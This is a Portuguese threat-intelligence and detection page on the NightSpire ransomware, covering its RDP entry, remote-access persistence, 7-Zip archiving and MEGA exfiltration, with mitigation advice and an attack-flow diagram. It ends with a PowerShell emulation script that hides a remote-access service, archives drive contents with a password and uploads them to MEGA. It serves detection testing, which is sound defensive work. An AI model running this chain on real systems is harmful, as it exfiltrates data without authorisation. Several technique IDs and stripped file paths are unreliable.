Seguir 
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumo
NightSpire é uma família de ransomware baseada em Go observada pela primeira vez no início de 2025 que usa um modelo de dupla extorsão, roubando dados antes da criptografia e ameaçando publicá-los em um site de vazamento baseado em Tor. O ransomware anexa uma .nspire extensão a arquivos criptografados e coloca notas de resgate em cada diretório afetado, incluindo pastas vinculadas ao OneDrive. Seus operadores dependem de ferramentas legítimas de administração remota para manter o acesso e usam utilitários disponíveis publicamente para descoberta, arquivamento e exfiltração. Entre março e junho de 2025, a campanha impactou pelo menos 64 organizações em 33 países.
Investigação
A investigação mostrou que os atacantes frequentemente ganharam acesso inicial através de RDP expostos e então instalaram Chrome Remote Desktop e AnyDesk como serviços persistentes. Eles usaram Everything para localizar rapidamente arquivos, 7-Zip para construir arquivos protegidos por senha, e MEGAsync para fazer upload dos dados roubados para o armazenamento em nuvem MEGA. O encriptador baseado em Go rodava sob conhost.exe, enumerava todos os drives disponíveis, e criptografava arquivos enquanto deixava inalterados os nomes de arquivos do OneDrive. A fase de extorsão dependia de um site de vazamento hospedado em Tor usado para pressionar as vítimas após a exfiltração.
Mitigação
As organizações devem reduzir ou eliminar a exposição direta do RDP, monitorar a implantação inesperada de ferramentas legítimas de administração remota como serviços, e aplicar lista de permissão de aplicativos a binários como Chrome Remote Desktop e AnyDesk. As detecções comportamentais devem focar na enumeração massiva de arquivos, criação de arquivos e uploads incomuns para serviços de armazenamento em nuvem. Backups regulares e procedimentos de recuperação testados são essenciais, e controles de rede devem bloquear endpoints conhecidos de upload do MEGA. As defesas também podem ser validadas através de exercícios de simulação de ransomware controlados, como os oferecidos pela Picus.
Resposta
Se a atividade do NightSpire for detectada, isole o endpoint afetado imediatamente, termine o processo do encriptador e colete memória volátil para análise. Desative quaisquer serviços maliciosos, remova as ferramentas de acesso remoto persistentes e bloqueie a comunicação de rede relacionada. A recuperação deve proceder a partir de backups confiáveis, e as partes interessadas relevantes devem ser notificadas. O incidente também deve ser relatado às autoridades policiais, enquanto os defensores continuam monitorando o site de vazamento associado em Tor por sinais de dados publicados.
graph TB %% Definição de classes classDef action fill:#99ccff classDef tool fill:#cccccc classDef malware fill:#ff6666 classDef process fill:#ffcc99 %% Nós action_initial_access[“<b>Ação</b> – Acesso inicial<br/><b>Técnica</b> – T1136 Criar Conta<br/><b>Descrição</b>: O adversário acessou a rede via Remote Desktop Protocol (RDP) para obter um ponto de apoio.”] class action_initial_access action tool_rdp[“<b>Ferramenta</b> – Remote Desktop Protocol (RDP)<br/><b>Descrição</b>: Permite login remoto em sistemas Windows.”] class tool_rdp tool action_persistence[“<b>Ação</b> – Persistência<br/><b>Técnica</b> – T1547.009 Modificação de Atalho<br/><b>Descrição</b>: Instalou AnyDesk e Chrome Remote Desktop como serviços e colocou atalhos na pasta de Inicialização para autoinício.”] class action_persistence action tool_anydesk[“<b>Ferramenta</b> – AnyDesk<br/><b>Função</b>: Software de acesso remoto; instalado como serviço do Windows e atalho anydesk.lnk.”] class tool_anydesk tool tool_chrome_rd[“<b>Ferramenta</b> – Chrome Remote Desktop<br/><b>Função</b>: Acesso remoto; executa como serviço remoting_host.exe.”] class tool_chrome_rd tool action_collection[“<b>Ação</b> – Coleta<br/><b>Técnica</b> – T1560.001 Arquivamento de Dados Coletados<br/><b>Descrição</b>: Usou 7-Zip para compactar pastas selecionadas em arquivos protegidos por senha após enumerar ficheiros com a ferramenta Everything.”] class action_collection action tool_7zip[“<b>Ferramenta</b> – 7-Zip<br/><b>Função</b>: Compacta dados em arquivos protegidos por senha.”] class tool_7zip tool tool_everything[“<b>Ferramenta</b> – Everything<br/><b>Função</b>: Utilitário de busca rápida de ficheiros usado para enumeração.”] class tool_everything tool action_exfiltration[“<b>Ação</b> – Exfiltração<br/><b>Técnicas</b> – T1537 Transferência de dados para conta na nuvem<br/>T1567.002 Exfiltração via serviço web<br/><b>Descrição</b>: Envio de arquivos preparados para o armazenamento em nuvem MEGA via MEGAsync.”] class action_exfiltration action tool_megasync[“<b>Ferramenta</b> – MEGAsync<br/><b>Função</b>: Sincroniza ficheiros locais com o armazenamento em nuvem MEGA para exfiltração.”] class tool_megasync tool action_impact[“<b>Ação</b> – Impacto<br/><b>Técnica</b> – T1486 Dados Encriptados para Impacto<br/><b>Descrição</b>: Encriptador baseado em Go executado via conhost.exe, encriptou ficheiros, adicionou extensão .nspire e deixou notas de resgate.”] class action_impact action malware_encryptor[“<b>Malware</b> – Encriptador Go<br/><b>Função</b>: Encripta ficheiros, adiciona .nspire, cria notas de resgate.”] class malware_encryptor malware process_conhost[“<b>Processo</b> – conhost.exe<br/><b>Papel</b>: Executa a carga do encriptador Go.”] class process_conhost process %% Ligações action_initial_access –>|usa| tool_rdp action_initial_access –>|leva a| action_persistence action_persistence –>|instala| tool_anydesk action_persistence –>|instala| tool_chrome_rd action_persistence –>|leva a| action_collection action_collection –>|usa| tool_7zip action_collection –>|enumera com| tool_everything action_collection –>|leva a| action_exfiltration action_exfiltration –>|usa| tool_megasync action_exfiltration –>|leva a| action_impact action_impact –>|executa| process_conhost process_conhost –>|lança| malware_encryptor
Fluxo de Ataque
Detecções
Possível Coleta de Dados [7zip] (via linha de comando)
Ver
Software Alternativo de Acesso Remoto / Gestão (via criação de processo)
Ver
Possível Instalação Oculta do Chrome Remote Desktop (via linha de comando)
Ver
Software Alternativo de Acesso Remoto / Gestão (via sistema)
Ver
Software Alternativo de Acesso Remoto / Gestão (via auditoria)
Ver
Detecção de Ferramentas de Persistência e Exfiltração do Ransomware NightSpire [Criação de Processo no Windows]
Ver
Execução de Simulação
Pré-requisito: A Verificação de Pré-voo de Telemetria e Base deve ter sido aprovada.
Justificativa: Esta seção detalha a execução precisa da técnica do adversário (TTP) projetada para acionar a regra de detecção. Os comandos e a narrativa DEVEM refletir diretamente os TTPs identificados e ter o objetivo de gerar a telemetria exata esperada pela lógica de detecção. Exemplos abstratos ou não relacionados levarão a um diagnóstico incorreto.
-
Narrativa e Comandos de Ataque:
- Configuração de Persistência (T1547 / T1219): Instale o Chrome Remote Desktop (caminho padrão) e inicie seu serviço para obter controle remoto persistente.
- Descoberta (T1083): Use Everything.exe para enumerar todos os arquivos no drive C:, salvando a saída em uma lista temporária.
- Arquivamento (T1037 / T1083): Invoque o 7-Zip para comprimir os arquivos descobertos em um arquivo protegido por senha.
- Exfiltração (T1219.003): Inicie MEGAsync para carregar o arquivo em uma conta MEGA.
A sequência assegura que seleção_acesso_remoto (Chrome Remote Desktop) esteja ativo enquanto pelo menos um de seleção_descoberta, seleção_arquivo, ou seleção_exfiltração ocorra, satisfazendo a condição da regra.
-
Script de Teste de Regressão:
# ------------------------------------------------------------------------- # Simulação de Persistência Lateral e Exfiltração do NightSpire # ------------------------------------------------------------------------- # Pré-requisitos: # - Chrome Remote Desktop instalado no caminho padrão # - Everything.exe instalado no caminho padrão # - 7z.exe instalado no caminho padrão # - MEGAsync instalado no caminho padrão do perfil de usuário # ------------------------------------------------------------------------- # 1. Assegure-se de que o serviço Chrome Remote Desktop está rodando (simula persistência) $crdPath = "$Env:ProgramFiles(x86)GoogleChrome Remote Desktop147.0.7727.3remoting_host.exe" if (Test-Path $crdPath) { Start-Process -FilePath $crdPath -ArgumentList "--start-service" -WindowStyle Hidden Write-Host "Chrome Remote Desktop service started." } else { Write-Error "Chrome Remote Desktop not found at $crdPath" exit 1 } # 2. Descoberta de arquivos com Everything $everythingPath = "$Env:ProgramFilesEverythingEverything.exe" $discoveryOutput = "$env:TEMPfilelist.txt" if (Test-Path $everythingPath) { & $everythingPath -search "C:" -output $discoveryOutput Write-Host "Discovery completed, results saved to $discoveryOutput" } else { Write-Error "Everything.exe not found at $everythingPath" exit 1 } # 3. Arquive os arquivos descobertos com 7-Zip $sevenZipPath = "$Env:ProgramFiles7-Zip7z.exe" $archivePath = "$env:TEMPexfil_archive.zip" if (Test-Path $sevenZipPath) { & $sevenZipPath a -tzip $archivePath "@$discoveryOutput" -p"StrongP@ssw0rd!" Write-Host "Archive created at $archivePath" } else { Write-Error "7z.exe not found at $sevenZipPath" exit 1 } # 4. Faça upload do arquivo via MEGAsync (exfiltração) $megaPath = "$Env:LOCALAPPDATAMEGAsyncMEGAsync.exe" if (Test-Path $megaPath) { & $megaPath --upload $archivePath Write-Host "Upload initiated via MEGAsync." } else { Write-Error "MEGAsync.exe not found at $megaPath" exit 1 } # End of simulation -
Comandos de Limpeza:
# Pare o serviço Chrome Remote Desktop Stop-Process -Name "remoting_host" -Force -ErrorAction SilentlyContinue # Remova arquivos temporários Remove-Item -Path "$env:TEMPfilelist.txt" -Force -ErrorAction SilentlyContinue Remove-Item -Path "$env:TEMPexfil_archive.zip" -Force -ErrorAction SilentlyContinue # Opcionalmente pare MEGAsync se estiver rodando Stop-Process -Name "MEGAsync" -Force -ErrorAction SilentlyContinue